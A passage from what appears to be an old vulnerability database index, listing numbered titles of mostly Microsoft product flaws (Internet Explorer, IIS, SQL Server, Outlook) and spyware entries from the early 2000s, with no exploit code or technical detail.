code [15703] Microsoft Jet Database Engine query could execute code [15698] Microsoft Internet Explorer and Outlook Express URL FORM spoofing [15591] Microsoft Visual Studio and Microsoft Visual C++ denial of service [15544] Microsoft Internet Explorer shell: command denial of service [15521] MSN (Microsoft Network) Messenger file transfer [15429] Microsoft Outlook MS04-009 patch is not installed [15427] Microsoft Network Messenger MS04-010 patch is not installed [15414] Microsoft Outlook 2002 mailto URL allows execution of code [15337] Microsoft Internet Explorer cross-frame domain restrictions bypass [15326] Microsoft Internet Explorer Perfect Nav plugin denial of service [15210] Microsoft Internet Explorer BMP bitmap image file integer overflow [15127] Microsoft Internet Explorer and Outlook null character in host name denial of service [15113] Microsoft Virtual PC for Mac allows elevated privileges [15078] Microsoft Internet Explorer vb script reports different errors to obtain information [15006] Microsoft Internet Explorer MS04-004 patch is not installed [14964] Microsoft Internet Explorer file extension spoofing [14845] Microsoft Convert.exe converts FAT32 to NTFS files systems insecurely [14609] ZyncosMark attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14601] WurldMedia attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14594] WinLocator BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14561] spyware VX2.BetterInternet attaches to processes of Microsoft Internet Explorer to obtain information [14560] VX2.BC777(SiteHlprBHO) attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14537] TopSearch attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14529] Thesten attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14522] Surfairy attaches to processes of Microsoft Internet Explorer and opens advertisements [14504] ShopNav Hijacker attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14494] SearchWWW attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14426] NavExcel attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14425] MyWebSearch Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14424] MyFastAccess Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14422] MSMediaservice attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14421] MSIEbho-Stub BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14418] MPGCom Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14400] Kontiki attaches to processes of Microsoft Internet Explorerand acts as part of the Web browser to bypass software [14396] JAJsoft.CSRS attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14395] iWon attaches to processes of Microsoft Internet Explorer and could allow a remote attacker to execute code [14390] IPInsight attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14389] Invictus MediaUpdate attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14383] IETop100 attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14380] IDGsearch spyware attaches to processes of Microsoft Internet Explorer and could allow execution of code [14378] IBIS Toolbar attaches to processes of Microsoft Internet Explorer to obtain information [14374] Httper attaches to processes of Microsoft Internet Explorer and allows execution of code [14348] Friend Toolbar attaches to processes of Microsoft Internet Explorer [14342] FindSex attaches to processes of Microsoft Internet Explorer and allows disclosure of information [14340] FavoriteMan attaches to processes of Microsoft Internet Explorer and may allow execution of code [14325] emes-x bho attaches to processes of Microsoft Internet Explorer and may allow execution of code [14316] e2Give attaches to processes of Microsoft Internet Explorer and obtains information [14314] DyFuCA attaches to processes of Microsoft Internet Explorer and obtains information [14256] BDSearch Plugin attaches to processes of Microsoft Internet Explorer and may replace the home page [14252] AutoSearchBHO attaches to processes of Microsoft Internet Explorer [14243] Alexa spyware attaches to processes of Microsoft Internet Explorer [14237] Microsoft URLScan Web server information disclosure [14188] HD Soft Windows FTP Server format string [14187] Microsoft Data Access Components (MDAC) broadcast request buffer overflow [14179] Microsoft Data Access Components (MDAC) MS04-003 patch is not installed [14178] Microsoft ISA Exchange Server 2003 MS04-002 patch is not installed [14177] Microsoft ISA MS04-001 patch is not installed [14167] Microsoft ISA Server 2000 H.323 filter buffer overflow [14137] GoodTech Telnet Server for Windows NT/2000/XP long string denial of service [14130] Microsoft Excel could allow an attacker to bypass the &quot [14129] Microsoft Word, Excel, and PowerPoint could allow an attacker to bypass the &quot [14128] Microsoft Word could allow an attacker to bypass &quot [14127] Microsoft Internet Explorer .lnk shortcuts could allow code execution [14105] Microsoft Internet Explorer showHelp directory traversal [14100] Windows Telnet Server username buffer overflow [14092] Microsoft Internet Explorer &quot [14077] Microsoft Internet Information Server (IIS) fails to properly log HTTP TRACK requests [13975] Microsoft Internet Explorer cache attack allows code execution [13960] FlashGet stores user passwords in plain text in Windows registry [13935] Microsoft Internet Explorer domain URL spoofing [13869] Microsoft Exchange Server OWA could allow unauthorized email account access [13847] Microsoft Internet Explorer download function cache directory disclosure [13846] Microsoft Internet Explorer subframe cross-site scripting [13845] Microsoft Internet Explorer mhtml: URL handler bypass check [13844] Microsoft Internet Explorer method caching perform actions [13809] Microsoft Internet Explorer scrollbar-base-color attribute denial of service [13795] Microsoft SharePoint settings.htm authentication bypass [13779] Microsoft Internet Explorer HTML injection [13682] Microsoft Word macro buffer overflow allows execution of code [13681] Microsoft Excel macro allows attacker to execute code [13680] Microsoft FrontPage Server Extensions SmartHTML Interpreter denial of service [13679] Microsoft Internet Explorer drag and drop could allow an attacker to save file to local system [13678] Microsoft Internet Explorer XML object could allow an attacker to obtain information [13677] Microsoft Internet Explorer script URLs zone bypass [13676] Microsoft Internet Explorer function pointer override zone bypass [13675] Microsoft Internet Explorer ExecCommand zone bypass [13674] Microsoft FrontPage Server Extensions debug buffer overflow [13652] Microsoft Data Access Components GET request [13617] Microsoft Internet Explorer clientCaps behavior could disclose sensitive information [13588] Microsoft Internet Explorer IFRAME tag could allow an attacker to execute files [13501] Microsoft Internet Explorer position: absolute denial of service [13500] Microsoft Word malformed document [13453] Microsoft Internet Information Server 404 error message determines service pack level [13433] Microsoft Exchange SMTP extended verb request denial of service [13432] Microsoft Exchange SMTP extended verb request buffer overflow [13421] Microsoft Exchange Server OWA Compose New Message form cross-site scripting [13403] HP OpenView Operations for Windows remote action [13376] Microsoft Internet Explorer Dynamic HTML behaviors allows an attacker to execute code [13314] Microsoft Internet Explorer popup window containing Object Data tags could allow an attacker to execute code [13300] Microsoft Internet Explorer XML Web page containing Object Data tags could allow an attacker to execute code [13285] Microsoft PowerPoint data manipulation [13242] Microsoft BizTalk Server insecure permissions in BizTalkServerDocs and BizTalkServerRespository directories allow file upload [13207] TM-POP3 Server stores user passwords in plain text in Windows registry [13176] Microsoft Internet Explorer media sidebar could allow an attacker to execute code [13166] Microsoft Internet Explorer history.back function allows attacker to obtain information from a site loaded in a different frame and domain [13165] Microsoft Internet Explorer NavigateAndFind function allows an attacker to obtain information and execute code [13163] Microsoft Internet Explorer window.open function allows an attacker to obtain information and execute code [13162] Microsoft Internet Explorer history.back function allows an attacker to obtain information and execute code [13161] Microsoft Internet Explorer allows an attacker to obtain cookies by opening Web site in _search window [13126] Microsoft ASP.NET could allow an attacker to bypass Request Validation feature [13116] Microsoft IIS MS03-018 patch is not installed on the system [13093] Microsoft Access Snapshot Viewer buffer overflow [13091] Microsoft Office WordPerfect converter buffer overflow [13090] Microsoft Word could allow an attacker to bypass Macro Security Model [13088] Microsoft IIS running RealSecure Server Sensor ISAPI plug-in denial of service [13029] Microsoft Internet Explorer input type tag denial of service [12970] Microsoft Internet Explorer DBCS Type property of Object tag buffer overflow [12962] Microsoft Internet Explorer BR549.DLL ActiveX control buffer overflow [12961] Microsoft Internet Explorer browser cache script injection [12960] Microsoft Internet Explorer Object Data tags could allow an attacker to execute code [12959] Microsoft Data Access Components broadcast request buffer overflow [12914] Microsoft Internet Explorer about:blank page cross-site scripting [12910] Microsoft Visual Studio MCWNDX ActiveX buffer overflow [12872] Microsoft NetMeeting malformed packet denial of service [12783] Microsoft Internet Information Server ASP engine could allow an attacker to upload malicious files [12704] Microsoft SQL Server named pipe hijack [12703] Microsoft SQL Server LPC buffer overflow [12702] Microsoft DirectX MIDI buffer overflows [12700] Microsoft SQL Server named pipe denial of service [12687] Microsoft IIS Remote Administration Tool allows attacker to reset administrative password [12686] Microsoft IIS Remote Administration Tool could allow an attacker to obtain valid session IDs [12684] Microsoft Exchange Server OWA Outlook 2003 denial of service [12627] Microsoft ISA homepage function error page cross-site scripting [12590] Microsoft Internet Explorer window.external.AutoScan function cross-site scripting [12538] Microsoft Internet Explorer C:\aux URL denial of service [12532] Microsoft Exchange OWA REFERER header cross-site scripting [12531] Microsoft Exchange OWA could allow an attacker to execute code [12530] Microsoft SQL Server CreateFile API function allows attacker to gain privileges [12512] IglooFTP PRO for Windows FTP banner, Username, Password, and Account functions buffer overflow [12490] Microsoft NetMeeting &quot [12444] Microsoft Internet Explorer HTML conversion library buffer overflow [12336] Microsoft Internet Explorer Homepage function could allow command execution [12334] Microsoft Internet Explorer MSXML cross-site scripting [12249] Microsoft Internet Explorer FTP implementation &quot [12193] Microsoft Internet Explorer &quot [12184] Microsoft Internet Explorer Type property of Object tag buffer overflow [12137] Microsoft Internet Explorer URL spoofing [12100] Microsoft IIS long WebDAV requests containing XML denial of service [12099] Microsoft IIS Response.AddHeader denial of service [12098] Microsoft IIS Server-Side Include (SSI) long file name buffer overflow [12097] Microsoft IIS redirect error cross-site scripting [12089] Microsoft SQL Server Jet OLE DB Provider is enabled [12043] Microsoft Internet Explorer Script Engine denial of service [12019] Microsoft Internet Explorer FRAME or IFRAME bypass restrictions [11946] Microsoft Internet Explorer anchorClick behavior denial of service [11918] Microsoft IIS authentication mechanism could allow an attacker to determine valid user account names [11901] Microsoft BizTalk Server 2002 SQL injection [11900] Microsoft BizTalk Server 2002 HTTP Receiver function buffer overflow [11873] Microsoft Internet Explorer, Outlook, and FrontPage shlwapi.dll library denial of service [11854] Microsoft Internet Explorer plug-in.ocx Load method buffer overflow [11849] Microsoft Internet Explorer Modal Dialog could allow an attacker to read files [11848] Microsoft Internet Explorer improper rendering of third party file types could allow code execution [11847] Microsoft Internet Explorer File Upload control allows attacker to obtain information [11846] Microsoft Internet Explorer URLMON.DLL library buffer overflow [11805] Microsoft Internet Explorer OBJECT tag denial of service [11776] Microsoft Active Directory insecure permissions on SYSTEM-account [11752] Microsoft ISA and Proxy Server Firewall and Winsock Proxy service denial of service [11751] Microsoft VM ByteCode Verifier improper validation of code [11589] Microsoft ActiveSync &quot [11576] Microsoft ISA DNS intrusion detection application filter denial of service [11537] Microsoft IIS WebDAV service is running on the system [11533] Microsoft IIS WebDAV long request buffer overflow [11507] Microsoft Internet Explorer .mht buffer overflow [11466] Microsoft Internet Explorer embedded HTML EXE file execution [11430] Microsoft Locator service is running on the system [11411] Microsoft Outlook CODEBASE value allows remote program execution [11264] Microsoft Internet Explorer MS03-004 patch is not installed on the system [11259] Microsoft Internet Explorer showHelp() zone bypass [11258] Microsoft Internet Explorer dialog box zone bypass [11250] Microsoft Internet Explorer dragDrop() method could be used to read local files [11133] Microsoft Outlook 2002 using V1 Exchange Server Security certificates transmits plaintext emails [10945] Microsoft Internet Explorer multimedia file URL cross-site scripting [10943] Gallery Windows XP Publishing feature could be used to execute commands [10883] Microsoft Internet Explorer Browser Helper Object (BHO) could disclose information [10833] Microsoft VM JDBC APIs could allow unauthorized database access [10822] Microsoft Word and Excel stores ODBC passwords and usernames in plain text [10809] Microsoft Internet Explorer MS02-068 patch is not installed on the system [10798] Microsoft Internet Explorer dialog window style parameter can access a user`s local security zone [10763] Microsoft Outlook malformed email header denial of service [10760] Microsoft RDS has been enabled on the system [10732] Sun Solaris OpenWindows mailtool(1) denial of service [10723] SSH Windows client URL buffer overflow [10674] Microsoft Internet Explorer IFRAME dialogArguments object can access a user`s local security zone [10670] Microsoft Data Access Components (MDAC) MS02-065 patch is not installed [10669] Microsoft Data Access Components RDS Data Stub client heap buffer overflow [10665] Microsoft Internet Explorer OBJECT tag could be used to read TIF folder name [10662] Microsoft Internet Explorer PNG inflate_fast() buffer overflow [10659] Microsoft Data Access Components RDS Data Stub server heap buffer overflow [10590] Microsoft Internet Information Server (IIS) MS02-062 patch [10588] Microsoft VM HTML Applet tag denial of service [10587] Microsoft VM passed HTML object denial of service [10586] Microsoft VM CabCracker class could allow an attacker to load .cab archives [10585] Microsoft VM StandardSecurityManager class restriction bypass [10584] Microsoft VM Java Applet codebase tag could be used to read files [10583] Microsoft VM INativeServices could be used to access clipboard contents [10582] Microsoft VM INativeServices could allow unauthorized memory access [10581] Microsoft VM Java Applet could disclose path to current directory [10580] Microsoft VM Java Applet class loader buffer overflow [10579] Microsoft VM URL redirect cross-domain Java Applet execution [10542] Microsoft SQL Server login accounts use weak encryption algorithm [10535] EventSave and EventSave+ could allow event loss from the Windows NT log [10504] Microsoft IIS script source access could be bypassed to upload .COM files [10503] Microsoft IIS WebDAV memory allocation denial of service [10502] Microsoft IIS out-of-process applications could be used to gain elevated privileges [10501] Microsoft IIS administrative Web pages cross-site scripting [10500] Microsoft Outlook Express fails to delete messages from dbx files [10459] Microsoft Internet Explorer could allow an attacker to bypass cookie restrictions [10443] Microsoft Internet Explorer saved &quot [10440] Microsoft Internet Explorer clipboardData cached object DOM access [10439] Microsoft Internet Explorer execCommand cached object DOM access [10438] Microsoft Internet Explorer getElementsByTagName cached object DOM access [10437] Microsoft Internet Explorer getElementsByName cached object DOM access [10436] Microsoft Internet Explorer getElementById cached object DOM access [10435] Microsoft Internet Explorer elementFromPoint cached object DOM access [10434] Microsoft Internet Explorer createRange cached object DOM access [10433] Microsoft Internet Explorer external cached object DOM access [10432] Microsoft Internet Explorer showModalDialog cached object DOM access [10388] Microsoft SQL Server Web tasks could allow elevated privileges [10371] Microsoft Internet Explorer oIFrameElement.Document cross-domain script execution [10370] Microsoft IIS HTTP HOST header denial of service [10342] Microsoft TSAC ActiveX connect.asp cross-site scripting [10338] Microsoft Outlook Express S/MIME certificate buffer overflow [10318] Microsoft Content Management Server (MCMS) ManualLogin.asp REASONTXT cross-site scripting [10294] Microsoft IIS .idc extension error message cross-site scripting [10290] Microsoft Internet Explorer saved &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10257] Microsoft SQL Server Agent scheduled jobs could create malicious output files [10255] Microsoft SQL Server Database Consistency Checker (DBCC) buffer overflow [10195] Microsoft FrontPage Server Extensions (FPSE) 2002 SmartHTML Interpreter buffer overflow [10194] Microsoft FrontPage Server Extensions (FPSE) 2000 SmartHTML Interpreter denial of service [10186] Microsoft Active Data Objects (ADO) buffer overflow [10184] Microsoft IIS 5.0 resource utilization denial of service [10180] Microsoft Internet Explorer fails to report an expired SSL CA certificate [10179] Microsoft Virtual Machine (VM) JDBC class allows access to ODBC data sources [10158] Microsoft Internet Explorer HTTP redirect bypass restrictions [10155] Microsoft Word INCLUDEPICTURE field in shared documents can be used to read other files [10135] Microsoft Virtual Machine (VM) XML methods can be accessed [10134] Microsoft Virtual Machine (VM) JDBC handle validation could crash Internet Explorer [10133] Microsoft Virtual Machine (VM) JDBC classes can execute local DLLs [10119] Microsoft NetMeeting RDS local session hijacking [10117] Microsoft Internet Explorer FTP URL denial of service [10067] Microsoft Outlook Express &quot [10066] Microsoft Internet Explorer frame/iframe javascript: URL cross-domain script execution [10044] Cisco VPN Client Windows utility program could decipher the group password [10039] Microsoft Internet Explorer URL encoded forward-slash &quot [10035] Microsoft Visual FoxPro could allow an attacker to execute an application [10033] Microsoft Outlook Express S/MIME spoofed CA certificate man-in-the-middle attack [10031] Microsoft SQL Server Resolution Service stack buffer overflow [10021] Cisco VPN 3000 series concentrators Windows PPTP client denial of service [10012] Microsoft SQL Server sp_MSSetServerProperties and sp_MSsetalertinfo stored procedures allow &quot [10008] Microsoft Word INCLUDETEXT field in shared documents can be used to read other files [9938] Microsoft Internet Explorer &quot [9937] Microsoft Internet Explorer file download origin spoofing [9936] Microsoft Internet Explorer XML redirect could be used to read files [9935] Microsoft Legacy Text Formatting ActiveX control buffer overflow [9934] Microsoft TSAC ActiveX control buffer overflow [9931] Microsoft Office Web Components MS02-044 patch is not installed on the system [9909] MySQL logging disabled by default on Windows [9907] Microsoft FTM ActiveX control could be used by an attacker to upload and download files [9906] Microsoft FTM ActiveX control &quot [9893] Microsoft SQL Server Agent jobs could be used to create and overwrite files [9886] Microsoft Internet Explorer Java logging could be used to execute code [9885] Microsoft Internet Explorer XML Datasource applet could be used to read local files [9883] Microsoft Internet Explorer Google Toolbar search request denial of service [9881] Microsoft Internet Explorer &quot [9877] Microsoft DirectX Files Viewer control buffer overflow [9857] Microsoft SQL Server XPs with weak permissions could allow elevated privileges [9848] Microsoft Internet Explorer HTM script execution [9791] Microsoft Exchange IIS license exhaustion denial of service [9789] Microsoft Exchange MSRPC denial of service [9788] Microsoft SQL Server pre-authentication buffer overflow [9785] Microsoft Content Management Server (MCMS) resource request SQL injection [9784] Microsoft Content Management Server (MCMS) Web authoring file execution [9783] Microsoft Content Management Server (MCMS) authentication buffer overflow [9734] Microsoft SQL Server MDAC OpenRowSet buffer overflow [9732] Microsoft Office Web Components (OWC) could allow a remote attacker to execute code [9724] Microsoft Outlook Express could allow the execution of XML files within the Temporary Internet File (TIF) directory [9667] Microsoft SQL Server MS02-038 patch [9666] Microsoft SQL Server MS02-039 patch [9662] Microsoft SQL Server Resolution Service keep-alive function denial of service [9661] Microsoft SQL Server Resolution Service heap buffer overflow [9660] Microsoft SQL Server replication stored procedures are vulnerable to SQL Injection [9659] Microsoft SQL Server Database Consistency Checker (DBCC) utilities have multiple buffer overflows [9658] Microsoft Exchange Server Internet Mail Connector (IMC) EHLO buffer overflow [9657] Microsoft Metadirectory Services (MMS) could allow unauthorized access to the data repository [9653] Microsoft Internet Explorer CTRL key could be used to upload files [9643] Microsoft Outlook Express malformed MIME headers could allow file type, size, and icon spoofing [9617] Microsoft Internet Explorer JavaScript page transitions denial of service [9580] Microsoft IIS SMTP service encapsulated addresses could allow mail relaying [9537] Microsoft Internet Explorer WebBrowser control OBJECT property could allow cross domain scripting [9531] Microsoft Internet Explorer CLASSID denial of service [9529] Microsoft Foundation Class Library ISAPI Buffer Overflow [9525] Microsoft Outlook PGP plug-in heap buffer overflow could allow remote code execution [9524] Microsoft SQL Server could store some passwords insecurely [9523] Microsoft SQL Server service account insecure registry permissions [9522] Microsoft SQL Server bulk data insert buffer overflow [9426] Microsoft Commerce Server new variant of AuthFilter ISAPI filter buffer overflow [9425] Microsoft Commerce Server OWC package installer folder permissions could allow remote command execution [9424] Microsoft Commerce Server OWC package installer buffer overflow [9423] Microsoft Commerce Server Profile Service API buffer overflow [9399] Microsoft Excel XSL Stylesheet allows attacker to execute script code [9398] Microsoft Excel allows macro execution if opened using hyperlink with drawing shape object [9397] Microsoft Excel execute inline macros [9367] Microsoft Internet Explorer Cascading Style-Sheet (CSS) bold font denial of service [9362] Microsoft Visual Studio .NET (Korean version) includes a Nimda-infected file [9346] Log Explorer for Microsoft SQL Server xp_logattach buffer overflow [9345] Microsoft SQL Server pwdencrypt() buffer overflow [9329] Microsoft SQL Server SQLXML XML tag script injection [9328] Microsoft SQL Server SQLXML ISAPI buffer overflow [9327] Microsoft IIS ISAPI HTR chunked encoding heap buffer overflow [9326] Microsoft RAS phonebook local buffer overflow [9290] Microsoft Internet Explorer FTP server name cross-site scripting [9276] Microsoft ASP.NET StateServer buffer overflow [9247] Microsoft Internet Explorer Gopher client malformed reply buffer overflow [9195] Microsoft Exchange message attribute denial of service [9187] Microsoft Passport SDK 2.1 Component Configuration Document (CCD) permission [9159] Microsoft Active Directory zero page length denial of service [9154] Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine have a default blank &quot [9146] Microsoft Passport SDK 2.1 events reporting disabled [9123] Microsoft IIS 5.0 Log Files Directory Permission Exposure [9122] Microsoft Internet Explorer JavaScript self.location refresh denial of service [9121] Microsoft Internet Explorer for Unix could cause the CDE or X Server to crash when scrolling Chinese characters [9101] Microsoft Internet Explorer cookies with embedded script could be used to access other cookies on the local system [9094] Microsoft Passport Manager PASSPORTLOG.LOG exposure [9091] Microsoft Passport Manager verbose mode exposure [9090] Microsoft Internet Explorer MS02-023 patch is not installed on the system [9089] Microsoft Internet Explorer and Outlook Express BGSOUND tag could allow an attacker to obtain sensitive information [9088] Microsoft Internet Explorer and Outlook Express IFRAME tag could allow attacker to send data to a DOS device [9087] Microsoft Internet Explorer and Outlook Express BGSOUND DOS device reference could cause a denial of service [9086] Microsoft Internet Explorer &quot [9085] Microsoft Internet Explorer &quot [9084] Microsoft Internet Explorer NetBIOS connection could allow rendering of Web sites with incorrect security zone [9081] InfraTrojan backdoor allows remote access to Windows [9077] Microsoft Word Mail Merge variant could allow an attacker to execute arbitrary commands [9068] Microsoft Passport SDK 2.1 registry default permission exposure [9067] Microsoft Passport SDK 2.1 default test site exposure [9066] Microsoft Passport SDK 2.1 Adventure Works Sample Site exposure [9065] Microsoft Passport SDK 2.1 Adventure Works Sample Site global.asa file default permission exposure [9064] Microsoft Passport SDK 2.1 default time window exposure [9022] Intruzzo backdoor allows remote access to Windows computers [8974] Cisco VPN Client insecure installation on Windows XP [8969] Microsoft Internet Explorer and Outlook Express malformed XBM file denial of service [8947] Microsoft Baseline Security Analyzer creates a plaintext security report file [8941] Microsoft Internet Explorer JavaScript recursive onError event denial of service [8926] Microsoft Outlook Express POP3 message containing two &quot [8917] Storing of credentials or .NET passports for network authentication is allowed in Windows XP [8904] Microsoft Internet Explorer self-referenced OBJECT directive denial of service [8887] Digital encryption of secure data is not enabled in Windows XP [8886] Anonymous enumeration of SAM accounts is enabled in Windows XP [8885] Digital encryption or signing of secure data is disabled in Windows XP [8868] Microsoft Internet Explorer dialog window cross-site scripting [8862] Microsoft BackOffice Server allows attacker to bypass authentication for Web administration pages [8853] Microsoft IIS CodeBrws.asp sample script can be used to view arbitrary file source code [8851] Microsoft Internet Explorer for Macintosh could allow remote AppleScript execution [8850] Microsoft Internet Explorer and Office for Macintosh HTML file:// directive buffer overflow [8844] Microsoft Internet Explorer history allows URLs using the JavaScript protocol [8816] Microsoft Internet Explorer does not clear local Web cache [8815] Microsoft VBScript ActiveX Word object denial of service [8811] Microsoft IIS MS02-018 patch is not installed on the system [8810] Microsoft Outlook allows users access to blocked attachments [8808] Microsoft Outlook Express allows attacker to create false attachment by changing icon [8804] Microsoft IIS redirected URL error cross-site scripting [8803] Microsoft IIS HTTP error page cross-site scripting [8802] Microsoft IIS Help File search cross-site scripting [8801] Microsoft IIS FTP session status request denial of service [8800] Microsoft IIS FrontPage Server Extensions and ASP.NET ISAPI filter error handling denial of service [8799] Microsoft IIS HTR ISAPI ISM.DLL extension buffer overflow [8798] Microsoft IIS SSI safety check buffer overflow [8797] Microsoft IIS ASP HTTP header parsing buffer overflow [8796] Microsoft IIS ASP data transfer heap buffer overflow [8795] Microsoft IIS ASP chunked encoding heap buffer overflow [8786] Microsoft OWC DataSourceControl component could allow an attacker to verify a file`s existence using the &quot [8785] Microsoft OWC Spreadsheet component could allow an attacker to verify a file`s existence using the &quot [8784] Microsoft OWC Chart component could allow an attacker to verify a file`s existence using the &quot [8779] Microsoft OWC Spreadsheet component &quot [8778] Microsoft OWC Spreadsheet component &quot [8777] Microsoft OWC Spreadsheet component &quot [8740] Microsoft Internet Explorer Cascading Style Sheets (CSS) can be used to read portions of local files [8711] Microsoft Office XP spreadsheet component host() function cross-application scripting [8708] Microsoft Outlook 2000 and 2002 executes embedded script in object tag when replying or forwarding HTML mail [8701] Microsoft Internet Explorer cookie allows remote attacker to execute script code in Local Computer zone [8681] Microsoft Exchange OWA using RSA Security SecurID authentication bypass [8667] Microsoft Internet Explorer and Outlook could allow the execution of files within Temporary Internet Files (TIFs) [8658] Microsoft Internet Explorer DYNSRC information disclosure [8615] Microsoft Outlook image tags allows remote attacker to bypass cookie settings [8613] Microsoft Outlook allows remote attacker to embed JavaScript in URLs using HREF attribute [8611] Microsoft Outlook IFRAME tags allows malicious Web sites to embed URLs [8589] Apache HTTP Server for Windows DOS batch file remote command execution [8488] Microsoft Internet Explorer JavaScript location.replace loop denial of service [8480] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Bytecode Verifier could allow a Java Applet to bypass security restrictions [8473] Microsoft Internet Explorer URL encoded characters could allow an attacker to access cookie information [8471] Microsoft Internet Explorer dotless IP variant could allow rendering of Web sites with incorrect Security Zone [8385] Microsoft IIS specially-crafted request reveals IP address [8382] Microsoft IIS authentication error messages reveal configuration information [8370] ARCserve backup client and Inoculan AV client for Microsoft Exchange stores plain text account information in exchverify.log [8362] Microsoft FrontPage form_results.txt is world readable [8359] Microsoft SQL Server multiple extended stored procedure buffer overflows [8356] Microsoft Outlook X-UIDL: header denial of service [8351] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Java Applet could be used to redirect browser traffic when using a proxy [8341] Microsoft Internet Explorer 4.0 long OBJECT CLASSID denial of service [8320] RealNetworks RealPlayer for Windows invalid .mp3 file denial of service [8280] Matrix screen saver for Windows 95 bypass password protection [8254] Microsoft Commerce Server 2000 AuthFilter ISAPI filter buffer overflow [8252] Microsoft Internet Explorer VBScript can be used to view local files [8243] Microsoft SQL Server OLE DB provider name &quot [8242] Microsoft Visual C++.Net and Visual C++ insecure buffer overflow protection [8218] Microsoft Internet Explorer Content-Type header cross-site scripting [8198] Microsoft Outlook Express &lt [8191] Microsoft IIS 5.1 specially-crafted .cnf file request could reveal file contents [8174] Microsoft IIS 5.1 .cnf file request could reveal sensitive information [8120] Microsoft Internet Explorer could allow an attacker to execute script despite disabled scripting [8118] Microsoft Internet Explorer could be used to open a program on a remote system [8117] Microsoft Internet Explorer could misrepresent file names in the file download dialog box [8116] Microsoft Internet Explorer HTML &quot [8092] Microsoft Exchange 2000 System Attendant sets incorrect registry permissions [8087] Microsoft Office v. X for Mac OS X PID Checker denial of service [8080] Microsoft Site Server sample sites allow SQL injection [8073] Microsoft Site Server LDAP_Anonymous user account generates weak passwords [8071] Microsoft Site Server ASP files reveals sensitive information [8069] Microsoft Site Server POST command directory traversal [8056] Microsoft IIS is running on the system [8053] Microsoft Site Server &quot [8051] Microsoft Site Server stores LDAP member passwords in plain text [8050] Microsoft Site Server default ASP pages allow cross-site scripting [8048] Microsoft Site Server LDAP_Anonymous default account and password [8036] ILOVEYOU or Love Letter worm uses Microsoft Outlook and mIRC to propagate and attack systems [7969] Microsoft Internet Explorer for Mac OS could allow execution of files [7954] BadBlue uploaded Microsoft Office document macro execution [7947] BadBlue Microsoft Office file viewing script non-existent file request denial of service [7946] BadBlue Microsoft Office file viewing script &quot [7941] Microsoft Internet Explorer CODEBASE value allows remote program execution [7938] Microsoft Internet Explorer HTML form denial of service [7919] Microsoft IIS 4.0 and Norton Internet Security 2001 default permissions could allow an attacker to modify log files [7906] Microsoft Internet Explorer clipboardData object allows a remote attacker to view clipboard information [7900] Microsoft Outlook PGP plug-in saves a decrypted copy of encrypted emails [7885] BioNet backdoor for Windows [7826] Microsoft Internet Explorer showModelessDialog() denial of service [7815] Apache for Windows &quot [7795] Microsoft FrontPage Server Extensions (FPSE) &quot [7788] Microsoft FrontPage Server Extensions (FPSE) &quot [7784] Microsoft Internet Explorer JavaScript OnError allows a remote attacker to determine a file`s existence [7758] Microsoft Internet Explorer GetObject directory traversal allows an attacker to read files [7737] Microsoft Internet Explorer &quot [7725] Microsoft SQL Server C runtime format string attack [7724] Microsoft SQL Server text message query buffer overflow [7712] Microsoft Internet Explorer XMLHTTP redirect reveals contents of file [7703] Microsoft Internet Explorer could allow automatic file download and execution [7702] Microsoft Internet Explorer &quot [7691] Microsoft IIS HTTP GET request with false &quot [7670] Microsoft Outlook Express allows blocked attachments to be opened when the message is forwarded [7663] Microsoft Exchange 5.5 OWA HTML email body embedded script execution [7661] Microsoft Internet Explorer settimeout function in JavaScript can cause the program to crash [7648] Microsoft Outlook Express for Macintosh long message line buffer overflow [7640] Microsoft IIS is present on the system [7636] Microsoft Internet Explorer could allow an attacker to spoof the file extension of a downloadable file [7613] Microsoft IIS allows attackers to create fake log entries [7610] CBlade worm infects Microsoft SQL Servers [7592] Microsoft Internet Explorer allows an attacker to determine password characters [7581] Microsoft Internet Explorer HTTP_USER_AGENT could allow attacker to determine the existence of patch Q312461 [7566] Microsoft IIS 2.0 and 3.0 upgraded to Microsoft IIS 4.0 fails to remove the ism.dll file [7563] Microsoft Zero Administration Kit (ZAK) could allow an attacker to bypass file restrictions [7559] Microsoft Index Server installed with IIS 4.0 could allow a local attacker to obtain physical path information [7558] Microsoft IIS FileSystemObject in showfile.asp could allow remote attackers to read arbitrary files [7545] Microsoft Internet Explorer installation wizard (ie5setup.exe) disables screen saver password and task scheduler [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7497] Microsoft Internet Explorer remote file enumeration [7486] Microsoft Internet Explorer &quot [7446] Microsoft ISA Server fragmented UDP packet flood denial of service [7426] Microsoft Internet Explorer may expose authentication information to redirected Web sites [7425] OpenVMS and DECwindows Motif Server allows unauthorized access [7407] Macintosh clients using Windows 2000 NTFS volumes can modify directory permissions [7354] Microsoft SQL Server 6.5 stores the SQLExecutiveCmdExec in registry using weak encryption algorithm [7336] Microsoft Internet Explorer for Mac OS X could allow the automatic execution of downloaded files [7313] Microsoft Internet Explorer allows JavaScript to spoof dialog boxes [7260] Microsoft Internet Explorer command execution with Telnet client in SFU [7259] Microsoft Internet Explorer URL can contain encoded HTTP requests to third-party site [7258] Microsoft Internet Explorer dotless IP could 